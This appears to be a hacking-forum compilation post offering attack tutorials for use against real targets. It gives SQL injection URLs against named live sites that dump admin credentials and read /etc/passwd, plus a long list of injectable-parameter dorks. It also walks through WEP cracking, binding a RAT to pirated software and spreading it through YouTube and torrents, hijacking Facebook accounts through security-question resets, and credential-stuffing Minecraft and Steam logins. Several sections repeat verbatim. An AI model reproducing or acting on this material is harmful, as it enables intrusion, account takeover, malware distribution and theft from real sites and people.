news.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,group_concat(table_name,0x0d0a),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 FROM INFORMATION_SCHEMA.TABLES--
0x0d0a is the hex values for \r\n or <br> so now we get the entire list in a nice readable fashion. Quick fast and to the point. Now there are times where this will not work properly and you would have to use the limit technique so donÂ’t forget what you have learned.
0x07
Since we now know the amount of columns, table name, and column name the site is pretty much owned. with the use of this injection you will see your results
http://www.itmaasia.com/news.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,concat(0x61646d696e5f69643a20,admin_id,0x20757365726e616d653a20,username,0x2070617373776f72643a20, password),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 FROM tb_admin --
0x08
Now just crack the password hash and thats it. the site is theoretically yours.
ONLY ONE OTHER THING. finding the admin panel or login spots now that will have to be up to you there is no easy way to find these you would have to check all the known admin directories or just guess. This information will not be included. Sorry your on your own.
0x09
A short explanation of the load_file() function
**** ALSO A LiVE SITE SO BEWARE ****
http://photos.surfline.com/view_image.ph...0,31,32,33--
this site looks much like any other injection except that we are using the load_file() function
LOAD_FILE(0x2f6574632f706173737764)
this does what it looks like it loads a file from their server into the injection. you will more than likely have to use hex or char or something to use loadfile the one there loads the /etc/passwd file from the site. there are also others that you could load for example the httpd.conf which is located at
/etc/httpd/conf/httpd.conf or in hex 0x2f6574632f68747470642f636f6e662f68747470642e636f6e66 there are others that would help you tremendously such as poisoning logs to put up a shell or viewing the admin login page theres tons of things you can view essentially every file on the server accessible. But these methods are for a later lesson.
0x10
In conclusion I hope that we all learned something and I have shed some light on to the world of sql injections and hacking in general. I would like to thank Enigmgroup for their patience and expertise and I would like to thank the many users who visit the site religiously.
Dorks:
Spoiler:
index.php?id=
trainers.php?id=
buy.php?category=
article.php?ID=
play_old.php?id=
declaration_more.php?decl_id=
pageid=
games.php?id=
page.php?file=
newsDetail.php?id=
gallery.php?id=
show.php?id=
staff_id=
newsitem.php?num=
readnews.php?id=
top10.php?cat=
historialeer.php?num=
reagir.php?num=
Stray-Questions-View.php?num=
forum_bds.php?num=
game.php?id=
view_product.php?id=
newsone.php?id=
sw_comment.php?id=
news.php?id=
avd_start.php?avd=
event.php?id=
product-item.php?id=
sql.php?id=
news_view.php?id=
select_biblio.php?id=
humor.php?id=
aboutbook.php?id=
ogl_inet.php?ogl_id=
fiche_spectacle.php?id=
communique_detail.php?id=
sem.php3?id=
kategorie.php4?id=
faq2.php?id=
show_an.php?id=
preview.php?id=
loadpsb.php?id=
opinions.php?id=
spr.php?id=
pages.php?id=
announce.php?id=
clanek.php4?id=
participant.php?id=
download.php?id=
main.php?id=
review.php?id=
chappies.php?id=
read.php?id=
prod_detail.php?id=
viewphoto.php?id=
person.php?id=
productinfo.php?id=
showimg.php?id=
view.php?id=
website.php?id=
hosting_info.php?id=
rub.php?idr=
view_faq.php?id=
artikelinfo.php?id=
detail.php?ID=
index.php?=
profile_view.php?id=
category.php?id=
publications.php?id=
fellows.php?id=
downloads_info.php?id=
prod_info.php?id=
shop.php?do=part&id=
collectionitem.php?id=
band_info.php?id=
product.php?id=
releases.php?id=
ray.php?id=
produit.php?id=
pop.php?id=
shopping.php?id=
productdetail.php?id=
post.php?id=
viewshowdetail.php?id=
clubpage.php?id=
memberInfo.php?id=
section.php?id=
theme.php?id=
page.php?id=
shredder-categories.php?id=
tradeCategory.php?id=
product_ranges_view.php?ID=
shop_category.php?id=
transcript.php?id=
channel_id=
item_id=
newsid=
news-full.php?id=
news_display.php?getid=
index2.php?option=
material.php?id=
viewapp.php?id=
galeri_info.php?l=
iniziativa.php?in=
curriculum.php?id=
labels.php?id=
story.php?id=
look.php?ID=
tekst.php?idt=
newscat.php?id=
newsticker_info.php?idn=
rubrika.php?idr=
rubp.php?idr=
offer.php?idf=
art.php?idm=
title.php?id=
- LFI
Spoiler:
Currently no TUT, please contact me with one or add it yourself it you happen to be admin
- XXS
Spoiler:
Currently no offical TUT, please contact me with one or add it yourself it you happen to be admin. Upon request I will put a small tip/overview, but nothing special
How do I Crack WEP/WPA?
- Cracking with BT (w.e version you are using)
Spoiler:
*Note* Keep all terminals open during process
Terminal 1Code: Select all
root@bt:~# ifconfig wlan0 up
root@bt:~# airmon-ng start wlan0
root@bt:~# airodump-ng mon0
***find the bssid and channel for WEP AP***
root@bt:~# airodump-ng -bssid {target-bssid} -c [target-channel} -w WEPcrack mon0
***wait for a client to pop-up to spoof MAC***
Terminal 2Code: Select all
root@bt:~# aireplay-ng -3 -b {target-bssid} -h {spoof-target-client-MAC} mon0
Terminal 3Code: Select all
root@bt:~# aircrack-ng WEPcrack-01.cap
Terminal 1Code: Select all
root@bt:~# ifconfig wlan0 up
root@bt:~# airmon-ng start wlan0
root@bt:~# airodump-ng mon0
***find the bssid and channel for WEP AP***
root@bt:~# airodump-ng -bssid {target-bssid} -c [target-channel} -w WEPcrack mon0
***wait for a client to pop-up to spoof MAC***
Terminal 2Code: Select all
root@bt:~# aireplay-ng -3 -b {target-bssid} -h {spoof-target-client-MAC} mon0
Terminal 3Code: Select all
root@bt:~# aircrack-ng WEPcrack-01.cap
How do I spread my RAT/Bot?
There are many ways of spreading (obviously), but these are the most common.... and easy
Spreading with Youtube
Spoiler:
1. Torrent some program you think would catch someone's attention. Facebook Friend Adder for example.
2. Screencap a demo of yourself using the keygen and the program.
3. Bind your RAT or bot to the keygen or program itself.
4. Upload your demo to youtube and upload the bundle to whatever file hosting site you prefer.
5. Link in description and wait for the slaves to come in.
2. Screencap a demo of yourself using the keygen and the program.
3. Bind your RAT or bot to the keygen or program itself.
4. Upload your demo to youtube and upload the bundle to whatever file hosting site you prefer.
5. Link in description and wait for the slaves to come in.
Spreading with Torrents
Spoiler:
Upload your torrent file to these torrent sites first
fulldls.com
torrents.sumotorrent.com
betenova.com
seedpeer.com
btjunkie.org
Wait until you have 05 seeds and 20 peers. Then you should upload the torrent file on these sites
torrentreactor.to
torrentportal.com
Wait until you have 10 seeds and 30 peers. Then you should upload the torrent file on these sites
torrentdownloads.net
torrentmatrix.com
Wait until you have 20 seeds and 40 peers. The you should upload the torrent file on these sites
torrentbox.com
mininova.org
After then wait for couple of hours i.e 10-12 hours then finally upload your torrent file on thepiratebay.se
Beware of mods! If you live in the US upload around 5-6am and if you live in the EU upload around mid morning depending on your timezone. Hopefully as long as it's FUD it should pass.
fulldls.com
torrents.sumotorrent.com
betenova.com
seedpeer.com
btjunkie.org
Wait until you have 05 seeds and 20 peers. Then you should upload the torrent file on these sites
torrentreactor.to
torrentportal.com
Wait until you have 10 seeds and 30 peers. Then you should upload the torrent file on these sites
torrentdownloads.net
torrentmatrix.com
Wait until you have 20 seeds and 40 peers. The you should upload the torrent file on these sites
torrentbox.com
mininova.org
After then wait for couple of hours i.e 10-12 hours then finally upload your torrent file on thepiratebay.se
Beware of mods! If you live in the US upload around 5-6am and if you live in the EU upload around mid morning depending on your timezone. Hopefully as long as it's FUD it should pass.
Hacking Facebook Accounts
Spoiler:
Facebook sends no plaintext passwords to your email, but it is quite easy to hack a facebook account with their email. Seeing as facebook hacks are usually personal its generally quite easy. I presume you have access to view their profile? If not you will have to find another way to do this first step. If so simply click on their profile, go to the info tab, scroll down too the bottom and look at their email address. If its Hotmail or Gmail (which is usually is) its incredibly easy. Ill use my example for hotmail but you can do the same thing with gmail.
Basically go to hotmail.com and say you have forgotten your password. Type in the email you got off facebook and check their security question. If you know the person its usually not that hard to guess. My girlfriends was "Where was your mother born" and one of my friends was "What does your Father do?". Their not hard to guess and even if you don't know the person well enough you can usually bring something like that up in casual conversation with ease. If you don't actually personally know the person and its a hack for lets say...taking over an admin over a page with 1 000 000 likes for advertisment purposes then you may have to do something slightly more difficult. You need at least SOME ground knowledge and you can make a claim to hotmail that you have forgot your recovery password and you have no access to back-up emails.
They get you to fill out a form of some basic details on your account which will require some social skills to obtain, but once again is still quite possible to strike up in general conversation if you just send them an inbox. Once you have access to their email - hurry. Because the next time they log on they will realize their password has been changed. Then simply go to facebook, say you forgot your password and have them email you a new one. DELETE the email after resetting the facebook password. Now if they have that stupid mobile security thing its incredibly simple to bypass. They will be sent a text regardless, but you can press the "lost your phone?" button and it will ask you to sign into your email directly. Easily done --- and bam you have access to their facebook.
Quickly do what you want too do and get out - especially if they were sent a text. This method has very easy to crack security but the owner will definately know they have been hacked. If you plan to fully take over their account or page be well aware they can send an email to facebook with a large amount of their details (previous passwords etc. etc.) and have their account restored so:
Reset the password multiple times
Turn OFF the phone thing, and if you have a spare phone register it too that number instead (don't use your personal one ffs)
Change the security question twice
Change one or two personal details
Tunnel like a bitch.
Basically go to hotmail.com and say you have forgotten your password. Type in the email you got off facebook and check their security question. If you know the person its usually not that hard to guess. My girlfriends was "Where was your mother born" and one of my friends was "What does your Father do?". Their not hard to guess and even if you don't know the person well enough you can usually bring something like that up in casual conversation with ease. If you don't actually personally know the person and its a hack for lets say...taking over an admin over a page with 1 000 000 likes for advertisment purposes then you may have to do something slightly more difficult. You need at least SOME ground knowledge and you can make a claim to hotmail that you have forgot your recovery password and you have no access to back-up emails.
They get you to fill out a form of some basic details on your account which will require some social skills to obtain, but once again is still quite possible to strike up in general conversation if you just send them an inbox. Once you have access to their email - hurry. Because the next time they log on they will realize their password has been changed. Then simply go to facebook, say you forgot your password and have them email you a new one. DELETE the email after resetting the facebook password. Now if they have that stupid mobile security thing its incredibly simple to bypass. They will be sent a text regardless, but you can press the "lost your phone?" button and it will ask you to sign into your email directly. Easily done --- and bam you have access to their facebook.
Quickly do what you want too do and get out - especially if they were sent a text. This method has very easy to crack security but the owner will definately know they have been hacked. If you plan to fully take over their account or page be well aware they can send an email to facebook with a large amount of their details (previous passwords etc. etc.) and have their account restored so:
Reset the password multiple times
Turn OFF the phone thing, and if you have a spare phone register it too that number instead (don't use your personal one ffs)
Change the security question twice
Change one or two personal details
Tunnel like a bitch.
Hacking Minecraft
Spoiler:
1. Download any proxy cracker you want (AccessDiver, Apex, etc)
2. Download a minecraft leecher to build up a user list
3. Download a proxy leecher+proxy scanner to build up a working proxy list to use
4. Download a decent wordlist. If you don't have any you can find some here: http://www.insidepro.com/eng/download.shtml
5. Load your proxies, user list, and pass list into your preferred cracker
6. Enter login url and start: http://www.minecraft.net/login
2. Download a minecraft leecher to build up a user list
3. Download a proxy leecher+proxy scanner to build up a working proxy list to use
4. Download a decent wordlist. If you don't have any you can find some here: http://www.insidepro.com/eng/download.shtml
5. Load your proxies, user list, and pass list into your preferred cracker
6. Enter login url and start: http://www.minecraft.net/login
Hacking Steam
Spoiler:
1. Download any proxy cracker you want (AccessDiver, Apex, etc). If you're on Windows look up Villain RC. There is a Steam profile included.
2. Download a steam leecher to collect usernames from the forum to use
3. Download a proxy leecher+proxy scanner to build up a working proxy list to use
4. Download a decent wordlist. If you don't have any you can find some here: http://www.insidepro.com/eng/download.shtml
5. Load your proxies, user list, and pass list into your preferred cracker
6. Enter login url and start: https://store.steampowered.com/login/
2. Download a steam leecher to collect usernames from the forum to use
3. Download a proxy leecher+proxy scanner to build up a working proxy list to use
4. Download a decent wordlist. If you don't have any you can find some here: http://www.insidepro.com/eng/download.shtml
5. Load your proxies, user list, and pass list into your preferred cracker
6. Enter login url and start: https://store.steampowered.com/login/
![[Image: mRg9m.png]](http://i.imgur.com/mRg9m.png)
![[+]](https://sinister.ly/images/modern/collapse_collapsed.png)
![[Image: 8536321abf.jpg]](http://puu.sh/kt29S/8536321abf.jpg)
Me and Lux are the realest users here.
![[Image: jWSyE88.png]](http://i.imgur.com/jWSyE88.png)